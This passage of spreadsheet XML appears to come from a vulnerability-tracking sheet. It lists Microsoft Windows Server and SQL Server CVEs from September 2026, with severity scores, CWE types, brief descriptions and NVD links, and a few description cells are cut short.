      <c r="S127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69727</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69773</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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8" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr"/>
      <c r="Q128" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69773</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69826</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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29" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr"/>
      <c r="Q129" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69826</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69847</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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0" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr"/>
      <c r="Q130" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="S130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69847</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69875</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K13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31" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr"/>
      <c r="Q131" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69875</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69876</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K132" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr"/>
      <c r="Q132" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-416</t>
        </is>
      </c>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="S132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69876</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68787</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K133" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr"/>
      <c r="Q133" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68787</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68832</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K13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4" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr"/>
      <c r="Q134" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68832</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68841</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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5" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr"/>
      <c r="Q135" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68841</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68875</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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 s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr"/>
      <c r="Q136" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows NTFS allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68875</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69265</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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7" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr"/>
      <c r="Q137" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69265</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69270</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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8" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr"/>
      <c r="Q138" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69270</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69293</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K13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39" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr"/>
      <c r="Q139" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69293</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69295</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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0" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr"/>
      <c r="Q140" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69295</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69298</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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1" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr"/>
      <c r="Q141" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69298</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69307</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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2" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr"/>
      <c r="Q142" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69307</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69312</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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3" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr"/>
      <c r="Q143" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69312</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69323</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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4" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr"/>
      <c r="Q144" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69323</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69352</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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5" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr"/>
      <c r="Q145" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69352</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69421</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
